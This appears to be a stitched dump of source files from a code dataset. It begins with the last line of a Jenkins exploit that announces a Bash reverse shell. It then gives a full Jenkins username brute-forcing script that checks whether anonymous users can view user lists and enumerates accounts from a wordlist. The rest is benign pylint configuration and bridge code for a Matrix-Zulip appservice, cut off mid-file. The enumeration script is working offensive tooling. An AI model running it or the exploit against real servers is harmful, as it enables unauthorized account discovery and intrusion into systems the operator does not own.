print ("[+] Exploit executed successfully, should receive a Bash reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,574 | Python | .py | 146 | 48.034247 | 181 | 0.688618 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,573 | enum_users.py | stevenvegar_Jenkins_scripts/enum_users.py/enum_users.py | import argparse
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Jenkins username bruteforcing. *Internet required* or use local wordlist to do it offline')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-wl', '--wordlist', type=str, help='Wordlist containing the usernames to try (default: Seclists usernames list)')
parser.add_argument('-ri', '--req_interval', type=int, help='Seconds to throttle each web request, useful for troubleshooting (default: 0)')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def download_dict():
# If no wordlist was specified in command line, it will download a Seclist from internet
try:
print ("[>] No wordlist was specified, downloading Seclist ", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames-dup.txt"
w = requests.get(url, timeout=3)
print ("[>] Downloading Seclists complete...")
return w.text.splitlines()
except:
print("[X] Error: Can not download Seclists dictionary from internet, should set --wordlist")
exit()
def load_dict(wordlist):
# If wordlist was specified, it will check if this can be opened
print (f"[>] Using wordlist {wordlist}")
try:
with open(wordlist, "r") as file:
words = file.read()
return words.splitlines()
except:
print ("[X] Error: Can not open specified wordlist, please check !")
exit()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
WORDLIST = load_dict(args.wordlist) if args.wordlist else download_dict()
REQ_TIME = args.req_interval if args.req_interval else 0
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
try:
r = requests.get(WEBSITE, proxies=PROXIES)
#Checking connection to Jenkins server
print ("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
#Server information based on response headers
print ("[+] Server version: " + r.headers['Server'])
print ("[+] Jenkins version: " + r.headers['X-Jenkins'])
print ("[+] Hudson version: " + r.headers['X-Hudson'])
print ("[ ] ...")
if r.status_code == 200:
s = requests.get(WEBSITE + "/asynchPeople/", proxies=PROXIES)
if s.status_code == 200:
print ("[+] Can Anonymous view the local user list? YES !")
print (f" [>] {WEBSITE}/asynchPeople/")
elif s.status_code == 403:
print ("[-] Can Anonymous view the local user list? NO !")
s = requests.get(WEBSITE + "/securityRealm/", proxies=PROXIES)
if s.status_code == 200:
print ("[+] Can Anonymous view Jenkins own user database? YES !")
print (f" [>] {WEBSITE}/securityRealm/")
elif s.status_code == 403:
print ("[-] Can Anonymous view Jenkins own user database? NO !")
elif s.status_code == 404:
print ("[-] Can Anonymous view Jenkins own user database? NO !")
print (" [X] Local authentication disabled")
print("[>] Initializing usernames bruteforcing ", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
start_time = time.time()
requests_count = 0
for index, user in enumerate(WORDLIST, start=1):
try:
time.sleep(REQ_TIME)
user_url = WEBSITE + "/user/" + user + "/api/xml"
t = requests.get(user_url, proxies=PROXIES)
requests_count += 1
if t.status_code == 200:
print (f"[+] Valid username found at index {index} : {user}")
print (f" [>] {user_url}")
percentage = round((index*100) / len(WORDLIST),2)
#Prints a message each time a multiple of 10000 is reached or when reaching user #10000
if index % 10000 == 0 or index == 10000:
elapsed_time = time.time() - start_time
rps = requests_count / elapsed_time
print (f"[>] Checking {index}/{len(WORDLIST)} ({percentage}%) of total users... | RPS: {rps:.2f}")
if percentage == 100:
print ("[+] Bruteforcing complete! All usernames in wordlist were checked...")
except KeyboardInterrupt:
print (f"[X] Bruteforcing exited by user! {index} usernames in wordlist were checked...")
exit()
except:
print ("[X] Error: Something went wrong. Check with --local_proxy and --req_interval 5")
exit()
if __name__ == "__main__":
main() | 5,059 | Python | .py | 98 | 47.27551 | 164 | 0.674305 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,574 | .pylintrc | GearKite_MatrixZulipBridge/.pylintrc | [MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=argparse
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=10
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=CVS
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked
# (useful for modules/projects where namespaces are manipulated during runtime
# and thus existing member attributes cannot be deduced by static analysis). It
# supports qualified module names, as well as Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.11
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
#variable-rgx=
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=132
# Maximum number of lines in a module.
max-module-lines=1000
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=old
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=raw-checker-failed,
bad-inline-option,
locally-disabled,
file-ignored,
suppressed-message,
useless-suppression,
deprecated-pragma,
use-symbolic-message-instead,
logging-fstring-interpolation,
unexpected-keyword-arg
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
enable=c-extension-no-member
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are text, parseable, colorized, json
# and msvs (visual studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work..
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io
| 21,277 | Python | .py | 458 | 44.181223 | 166 | 0.788316 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,575 | test_import.py | GearKite_MatrixZulipBridge/tests/test_import.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
# pylint: skip-file
import matrixzulipbridge.appservice
import matrixzulipbridge.command_parse
import matrixzulipbridge.control_room
import matrixzulipbridge.direct_room
import matrixzulipbridge.event_queue
import matrixzulipbridge.organization_room
import matrixzulipbridge.personal_room
import matrixzulipbridge.room
import matrixzulipbridge.space_room
import matrixzulipbridge.stream_room
import matrixzulipbridge.version
def test_dummy():
assert True
| 1,458 | Python | .py | 37 | 38.243243 | 95 | 0.821705 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,576 | space_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/space_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING
from mautrix.api import Method, Path
from mautrix.types import SpaceChildStateEventContent
from mautrix.types.event.type import EventType
from matrixzulipbridge.under_organization_room import UnderOrganizationRoom
if TYPE_CHECKING:
from mautrix.types import RoomID
from matrixzulipbridge.organization_room import OrganizationRoom
class SpaceRoom(UnderOrganizationRoom):
name: str
# pending rooms to attach during space creation
pending: list[str]
def init(self) -> None:
super().init()
self.name = None
self.pending = []
def is_valid(self) -> bool:
if not super().is_valid():
return False
# we are valid as long as our user is in the room
if not self.in_room(self.user_id):
return False
return True
@staticmethod
async def create(
organization: "OrganizationRoom", initial_rooms: list["RoomID"]
) -> "SpaceRoom":
logging.debug(
f"SpaceRoom.create(organization='{organization.id}' ({organization.name}))"
)
room = SpaceRoom(
None,
organization.user_id,
organization.serv,
[organization.user_id, organization.serv.user_id],
[],
)
room.name = organization.name
room.organization = organization # only used in create_finalize
room.organization_id = organization.id
room.pending += initial_rooms
return room
async def create_finalize(self) -> None:
resp = await self.az.intent.api.request(
Method.POST,
Path.v3.createRoom,
{
"creation_content": {
"type": "m.space",
},
"visibility": "private",
"name": self.organization.name,
"topic": f"Organization space for {self.organization.name}",
"invite": [self.organization.user_id],
"is_direct": False,
"initial_state": [
{
"type": "m.space.child",
"state_key": self.organization.id,
"content": {"via": [self.organization.serv.server_name]},
}
],
"power_level_content_override": {
"events_default": 50,
"users_default": 0,
"invite": 50,
"kick": 50,
"redact": 50,
"ban": 50,
"events": {
"m.room.name": 0,
"m.room.avatar": 0, # these work as long as rooms are private
},
"users": self.organization.permissions
| {self.organization.serv.user_id: 100},
},
},
)
self.id = resp["room_id"]
self.serv.register_room(self)
await self.save()
# attach all pending rooms
rooms = self.pending
self.pending = []
for room_id in rooms:
await self.attach(room_id)
def cleanup(self) -> None:
try:
organization = self.serv._rooms[self.organization_id]
if organization.space == self:
organization.space = None
organization.space_id = None
asyncio.ensure_future(organization.save())
logging.debug(
f"Space {self.id} cleaned up from organization {organization.id}"
)
else:
logging.debug(
f"Space room cleaned up as a duplicate for organization {organization.id}, probably fine."
)
except KeyError:
logging.debug(
f"Space room cleaned up with missing organization {self.organization_id}, probably fine."
)
super().cleanup()
async def attach(self, room_id: "RoomID") -> None:
# if we are attached between space request and creation just add to pending list
if self.id is None:
logging.debug(f"Queuing room {room_id} attachment to pending space.")
self.pending.append(room_id)
return
logging.debug(f"Attaching room {room_id} to space {self.id}.")
await self.az.intent.send_state_event(
self.id,
EventType.SPACE_CHILD, # pylint: disable=no-member
state_key=room_id,
content=SpaceChildStateEventContent(via=[self.serv.server_name]),
)
async def detach(self, room_id: "RoomID") -> None:
if self.id is not None:
logging.debug(f"Detaching room {room_id} from space {self.id}.")
await self.az.intent.send_state_event(
self.id,
EventType.SPACE_CHILD, # pylint: disable=no-member
state_key=room_id,
content=SpaceChildStateEventContent(),
)
elif room_id in self.pending:
logging.debug(f"Removing {room_id} from space {self.id} pending queue.")
self.pending.remove(room_id)
async def post_init(self) -> None:
try:
organization = self.serv._rooms[self.organization_id]
if organization.space is not None:
logging.warning(
f"Network room {organization.id} already has space {organization.space.id} but I'm {self.id}, we are dangling."
)
return
organization.space = self
logging.debug(f"Space {self.id} attached to organization {organization.id}")
except KeyError:
logging.debug(
f"Network room {self.organization_id} was not found for space {self.id}, we are dangling."
)
self.organization_id = None
| 6,970 | Python | .py | 170 | 29.958824 | 131 | 0.586741 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,577 | control_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/control_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import re
from argparse import Namespace
from html import escape
from typing import TYPE_CHECKING
from urllib.parse import urlparse
from mautrix.errors import MatrixRequestError
from matrixzulipbridge import __version__
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.personal_room import PersonalRoom
from matrixzulipbridge.room import Room
if TYPE_CHECKING:
from mautrix.types import MessageEvent
class ControlRoom(Room):
commands: CommandManager
def init(self):
self.commands = CommandManager()
cmd = CommandParser(
prog="PERSONALROOM",
description="create a personal room for an organization",
)
cmd.add_argument("organization", nargs="?", help="organization name")
self.commands.register(cmd, self.cmd_personalroom)
if self.serv.is_admin(self.user_id):
cmd = CommandParser(
prog="ORGANIZATIONS", description="list available Zulip organizations"
)
self.commands.register(cmd, self.cmd_organizations)
cmd = CommandParser(
prog="OPEN", description="open organization for connecting"
)
cmd.add_argument("name", help="organization name (see ORGANIZATIONS)")
cmd.add_argument(
"--new",
action="store_true",
help="force open a new organization connection",
)
self.commands.register(cmd, self.cmd_open)
cmd = CommandParser(
prog="STATUS",
description="show bridge status",
epilog="Note: admins see all users but only their own rooms",
)
self.commands.register(cmd, self.cmd_status)
cmd = CommandParser(
prog="QUIT",
description="disconnect from all organizations",
epilog=(
"For quickly leaving all organizations and removing configurations in a single command.\n"
"\n"
"Additionally this will close current DM session with the bridge.\n"
),
)
self.commands.register(cmd, self.cmd_quit)
cmd = CommandParser(prog="MASKS", description="list allow masks")
self.commands.register(cmd, self.cmd_masks)
cmd = CommandParser(
prog="ADDMASK",
description="add new allow mask",
epilog=(
"For anyone else than the owner to use this bridge they need to be allowed to talk with the bridge bot.\n"
"This is accomplished by adding an allow mask that determines their permission level when using the bridge.\n"
"\n"
"Only admins can manage organizations, normal users can just connect.\n"
),
)
cmd.add_argument(
"mask", help="Matrix ID mask (eg: @friend:contoso.com or *:contoso.com)"
)
cmd.add_argument("--admin", help="Admin level access", action="store_true")
self.commands.register(cmd, self.cmd_addmask)
cmd = CommandParser(
prog="DELMASK",
description="delete allow mask",
epilog=(
"Note: Removing a mask only prevents starting a new DM with the bridge bot. Use FORGET for ending existing"
" sessions."
),
)
cmd.add_argument(
"mask", help="Matrix ID mask (eg: @friend:contoso.com or *:contoso.com)"
)
self.commands.register(cmd, self.cmd_delmask)
cmd = CommandParser(
prog="ADDORGANIZATION", description="add a Zulip organization"
)
cmd.add_argument("name", help="server address")
self.commands.register(cmd, self.cmd_addorganization)
cmd = CommandParser(
prog="DELORGANIZATION", description="delete a Zulip organization"
)
cmd.add_argument("name", help="organization name")
self.commands.register(cmd, self.cmd_delorganization)
cmd = CommandParser(prog="FORGET", description="Forget a Matrix user")
cmd.add_argument("user", help="Matrix ID (eg: @ex-friend:contoso.com)")
self.commands.register(cmd, self.cmd_forget)
cmd = CommandParser(
prog="DISPLAYNAME", description="change bridge displayname"
)
cmd.add_argument("displayname", help="new bridge displayname")
self.commands.register(cmd, self.cmd_displayname)
cmd = CommandParser(prog="AVATAR", description="change bridge avatar")
cmd.add_argument("url", help="new avatar URL (mxc:// format)")
self.commands.register(cmd, self.cmd_avatar)
cmd = CommandParser(
prog="MEDIAURL", description="configure media URL for links"
)
cmd.add_argument("url", nargs="?", help="new URL override")
cmd.add_argument(
"--remove",
help="remove URL override (will retry auto-detection)",
action="store_true",
)
self.commands.register(cmd, self.cmd_media_url)
cmd = CommandParser(
prog="MEDIAPATH", description="configure media path for links"
)
cmd.add_argument("path", nargs="?", help="new path override")
cmd.add_argument(
"--remove", help="remove path override", action="store_true"
)
self.commands.register(cmd, self.cmd_media_path)
cmd = CommandParser(prog="VERSION", description="show bridge version")
self.commands.register(cmd, self.cmd_version)
